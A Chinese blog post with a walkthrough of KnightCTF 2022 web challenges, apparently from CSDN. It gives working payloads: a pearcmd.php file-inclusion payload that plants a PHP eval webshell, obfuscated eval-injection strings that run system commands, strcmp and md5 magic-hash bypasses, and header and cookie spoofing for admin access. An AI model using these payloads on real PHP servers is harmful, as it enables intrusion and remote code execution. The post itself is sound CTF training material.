KnightCTF WEB

最新推荐文章于 2023-04-10 15:41:16 发布
最新推荐文章于 2023-04-10 15:41:16 发布
阅读量292 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/122642289
版权

前言

不难,就是fuzz和脑洞有点多

Do Something Special

按钮点击发现url转到 /gr@b_y#ur_fl@g_h3r3!# 明显不对,将其urlencode转码为%23访问出现flag

Flag:KCTF{Sp3cial_characters_need_t0_get_Url_enc0ded}

My PHP Site


文件包含,可以利用伪协议读源码,也可以直接打pearcmd.php来getshell

payload

/?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?eval($_POST[0]);?>+-s+

再去包含执行命令


FLAG: KCTF{L0C4L_F1L3_1ncLu710n}

Obsfuscation Isn’t Enough

查看html发现jsfuck
解密发现 150484514b6eeb1d99da836d95f6671d.php

直接访问php文件
FLAG: KCTF{0bfuscat3d_J4v4Scr1pt_aka_JSFuck}

Zero is not the limit

Hint: /user/
开始返回一堆json


/user/ 下对应每一个用户,访问-1出flag

FLAG: KCTF{tHeRe_1s_n0_l1m1t}

Find Pass Code – 1

发现注释:
Hi Serafin, I learned something new today.
I build this website for you to verify our KnightCTF 2022 pass code. You can view the source code by sending the source param

访问:url/?source得到源码

<?php
require "flag.php";
if (isset($_POST["pass_code"])) {
    if (strcmp($_POST["pass_code"], $flag) == 0) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}
?>

数组bypass,Post: pass_code[]=1

FLAG: KCTF{ShOuLd_We_UsE_sTrCmP_lIkE_tHaT}

Most Secure Calculator-1

源码

<?php
if (isset($_POST["equation"]) && !is_array($_POST["equation"])) {
if (empty($_POST["equation"])) {
echo "Please enter some eqation.";
} else {
if (strlen($_POST["equation"]) >= 25) {
	echo "Oow ! You have entered an equation that is too big for me.";
} else {
	echo "<h1> Result : <br>";
	eval("echo " . $_POST["equation"] . ";");
	echo "</h1>";
	}}}
?>

直接塞到eval
FLAG:KCTF{WaS_mY_cAlCuLaToR_sAfE}

Find Pass Code - 2

  • 魔术hash
  • md5
<?php
require "flag.php";
$old_pass_codes = array("0e215962017", "0e730083352", "0e807097110", "0e840922711");
$old_pass_flag = false;
if (isset($_POST["pass_code"]) && !is_array($_POST["pass_code"])) {
    foreach ($old_pass_codes as $old_pass_code) {
        if ($_POST["pass_code"] === $old_pass_code) {
            $old_pass_flag = true;
            break;
        }
    }
    if ($old_pass_flag) {
        echo "Sorry ! It's an old pass code.";
    } else if ($_POST["pass_code"] == md5($_POST["pass_code"])) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}
?>

爆破是不可能爆破的,搜集了魔术hash,随便挑个
魔术hash

0e215962017:0e291242476940776845150308577824
0e730083352:0e870635875304277170259950255928
0e807097110:0e318093639164485566453180786895
0e840922711:00e64922204642369621338070008986
0e1137126905:0e291659922323405260514745084877
0e1284838308:0e708279691820928818722257405159
0e2799298535:0e258310720843549656960157258725
0e3335999050:0e130023719718288785799459522477
0e3519466817:0e094940930906507337180165634011

FLAG:KCTF{ShOuD_wE_cOmPaRe_MD5_LiKe_ThAt__Be_SmArT}

Bypass!! Bypass!! Bypass!!

注释发现

<!-- generats auth token -> /api/request/auth_token -->

经过尝试bypass 403 失败

/api/request/auth_token    Allow: POST, OPTIONS
/      Allow: GET, HEAD, OPTIONS

Github搜索得到源码 bug-bounty-labs

添加头部
X-Authorized-For: 获取的token

FLAG:KCTF{cOngRatUlaT10Ns_wElCoMe_t0_y0ur_daShBoaRd}

Most Secure Calculator -2

只允许字母数字,那就是异或 取反绕过,fuzz以下构造命令

payload

(~%8C%86%8C%8B%9A%92)(~%D7%DD%8F%88%9B%DD%D6%C4)
("393480"^"@@@@]]")(("8!4@80!8"^"[@@`^@_").(".").("484"^"@@@"))
"\163\171\163\164\145\155"("\143\141\164\40\146\154\141\147\56\164\170\164")

FLAG: KCTF{sHoUlD_I_uSe_eVaL_lIkE_tHaT}

Can you be Admin?

User-Agent: KnightSquad
接着
Referer: localhost

Jsfuck 发现 Unicode,Unicode编码解码 (bt.cn)

F`V,7DIIBn+?CWe@<,q!$?0EpF*DPCA0<oU8RZI/DJ<`sF8

然后ascii85解码, ASCII85解码计算器

username : tareq ,password : IamKnight

登录后是普通用户,然后返回包cookie返回奇怪字段base64后重新更改为Admin,发包 发现flag

FLAG: KCTF{FiN4LlY_y0u_ar3_4dm1N}

Ff.cheng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd裸文件包含]
qwsn
12-12 3390
时间戳——2021.12.12 0x01 WP: 第一步:拉去本地代码审计(框架调试) 第二步:调试过程 第三步:在buuctf开启的的环境里获取flag 附:怎么配置phpstorm+phpstudy+xdebug远程调试 注意:配置一个假的远程调试,我们就把源码放到本机(也就是127.0.0.1)的网站根目录WWW下的exp/willphpv2目录下 第一步:访问https://xdebug.org/wizard,把phpinfo的内容贴进去,会返回我们可以使用的对应版本的xdebug 第二
BetterKnightWeb-crx插件
04-04
语言:English 在KnightWeb课程结果中添加SOFI评分和用户界面改进。 BetterKnightWeb通过清理用户界面并在课程信息中添加SOFI分数和预期成绩来改善Geneseo的KnightWeb服务。 SUNY Geneseo既不认可也不隶属于该扩展。 更改日志:-错误修复,以确保BetterKnightWeb仅影响类查找页面。 -增加了部分成绩。 -浏览器和BetterKnightWeb之间的端到端加密。
KnightCTF2022-WP
qq_45989120的博客
01-24 568
Feistel 密码结构 Challenge: m, n = 21, 22 def f(word, key): out = "" for i in range(len(word)): out += chr(ord(word[i]) ^ key) return out flag = open("flag.txt", "r").read() L, R = flag[0:len(flag)//2], flag[len(flag)//2:] x = "".join(chr
KnightCTF-2022_The Hungry Dragon
weixin_46245411的博客
01-23 513
我感觉这是一个很有意思的3D 文件(附上链接:The Hungry Dragon) 打开发现是一个3D模型, 然后下一步需要看一下有没有什么其他信息, 这里提示说“需要发现这条龙吃了多少甜甜圈和糖果”,所以我们需要“进入它的身体看看~” 点击“混合现实”, 直接滑动鼠标滚轮,进入恐龙的食道, 可以看到,确实“有点东西”在里面。 下一步就是统计一下绿色的糖果和黄色的甜甜圈了, 虽然都是两个“绿色的糖果”和一个“黄色的甜甜圈”,但是仔细一点就可以发现,它们出...
Knight CTF 2022 WEB wp
yink12138的博客
02-09 3040
Knight CTF 2022 WEB wp
KnightCTF-2022_Can you be Admin?
weixin_46245411的博客
01-24 2488
直接查看一下网址源码,发现真的空空如也, 这种情况可以考虑:1、扫一下后台;2、BP抓包;3、跑一下隐藏参数...... 由于比赛说明不需要扫描,所以下一步直接BP抓包, 根据“Only KnightSquad agents can access this page.” 发现发送的数据包中的,“User-Agent” 与提示有联系,所以直接修改, User-Agent: KnightSquad 根据“This page refers to knight squad...
[MRCTF2020]Ez_bypass详解
qq_52364123的博客
04-10 418
buuctf-[MRCTF2020]Ez_bypass-代码审计
CTF中的pearcmd.php文件包含
XINO
09-27 1010
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
1月全球CTF比赛时间汇总来了!
网络安全
01-06 5907
●从事网络安全行业工作,怎么能不参加一次CTF比赛了!小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣!下面给大家分享一下1月份CTF比赛时间,比赛按时间先后排序,国内国外的都有哦!临近新年,国内比赛比较少。文章末尾有ctf部落群国内CTF比赛汇总西湖论剑·2022中国杭州网络安全技能大赛12月13日,在“首届全球数字贸易博览会·数字安全主题论坛”上,浙江省公安厅一级警务专员石小忠、浙江省委网...
利用 pearcmd.php 实现 Getshell
1tachi的博客
01-12 625
文章目录源码分析利用Pearcmd.php 学习连接:西湖论剑的一道Web 源码 <?php highlight_file(__FILE__); if(isset($_GET['check'])){ if(file_get_contents($_GET['check']) === "LFI"){ @include($_GET['a']); }else{ die("no!"); } } 分析 信息搜集了一圈,啥也没有,也就是说不知
php中hash比较缺陷
swag000
07-14 490
php中hash比较缺陷 文章目录php中hash比较缺陷php中处理hash时的缺陷强弱类型比较Magic Hasheshash以0e开头MD5MD4SHA1hash转换前后相等(等于0)MD5MD4SHA1与hash缺陷无关的数组绕过方法关于MD5强碰撞问题总结部分`md5`强比较相等字符 哈希算法(Hash Algorithm)又称散列算法、散列函数、哈希函数,哈希算法主要有MD4、MD5、SHA php中处理hash时的缺陷 我们比较 hash字符串的时候,常常用到 等于( == )、不等于(
利用pearcmd.php从LFI到getshell
feng的博客
10-29 5181
前言 也是从来没有学习过这种LFI的思路。今天晚上再复现前几天的强网杯拟态的时候遇到了这个pearcms.php的文件包含,进行了一波学习。 环境 安装了pear(这样才能有pearcmd.php) 开启了register_argc_argv 存在文件包含且可以包含后缀为php的文件且没有open_basedir的限制。 先说说这个pear。我就说觉得这东西为什么很眼熟,原来昨天看php底层C的目录结构的时候刚看到过。这个东西的全称叫PHP Extension and Application Repos
pear文件包含学习记录
paidx0
04-07 755
中文全称PHP扩展应用库 php go-pear.php即可安装,没有就先要去官网下 go-pear.php 一般都是装在/usr/local/lib/php/pearcmd.php 然后就是要在php.ini处找到这个给打开register_argc_argv=ON,默认也是开启的 下面就可以愉快的测试了 正文 开启register_argc_argv 有什么用处?开启了之后$_SERVER[‘argv’]就开始生效了 <?php var_dump($_SERVER); ?> ["arg
2020山东省职业院校技能大赛“网络空间安全”赛题及赛题解析(超详细)
01-05 754
2020年中职组“网络空间安全”赛项 山东省竞赛任务书 模块 A 基础设施设置与安全加固(200分) 模块B 网络安全事件响应、数字取证调查和应用安全(400分) 模块C CTF夺旗-攻击(200分) 模块D CTF夺旗-防御(200分) 不懂的可以私信博主! 山东省竞赛任务书 一、竞赛时间 上午 8:00-11:00 考察模块A.B 下午13:00-16:00考察模块C.D 共计6小时模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 1.5 ...
php 利用pearcmd实现裸文件包含
weixin_45805993的博客
12-03 1910
主要内容参考P神博客https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 0x00phpinfo与条件竞争 之前做题好像遇到过,再复习一下 我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件中,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉
MD5碰撞
热门推荐
qq_64201116的博客
08-23 1万+
CTF中可以说是经常碰到md5加密了,一般都是进行强比较抑或是弱比较,考法非常多,但是万变不离其中。只要我们掌握了原理,一切问题便迎刃而解了。文章首发于我的博客,格式可能比较清晰,有兴趣了解CTF中MD5碰撞的伙伴可以移步查看。
005 - 马科维茨投资组合理论实现
08-10
python基于tushare实现马科维茨投资组合理论实现
基于ASP的学生信息档案管理系统毕业论文及源码.rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT).zip
最新发布
08-10
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT)
毕业设计,基于ASP+SqlServer开发的高校工资管理系统,内含完整源代码,数据库,毕业论文
08-10
毕业设计,基于ASP+SqlServer开发的高校工资管理系统,内含完整源代码,数据库,毕业论文 随着网络应用技术的飞速发展,基于网络的应用系统给人们带来了诸多便利。建立高校工资管理系统是为了适应现代化校园管理的需要,方便管理职工工资情况和职工个人信息;同时也方便职工可以上网查询自己的工资信息,还有利于提高办公效率,改善办公质量,规范高校职工工资的常规管理工作。 高校工资管理系统的开发是基于B/S结构,采用ASP编程技术及SQL Server数据库进行开发。本文首先对网站开发环境和运行平台、数据库、ASP编程技术做了简要的介绍,并对工资管理系统的设计进行了详细的需求分析;然后给出了高校工资管理系统的设计方案及系统的具体实现,实现了高校工资管理系统的构建,主要包括系统工资管理模块、职工信息查询模块和系统信息管理及维护模块;最后,通过测试与分析,说明该系统运行稳定、可靠,具有一定的实用价值。 关键词:工资管理系统;信息查询;信息管理;信息维护;网络数据库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值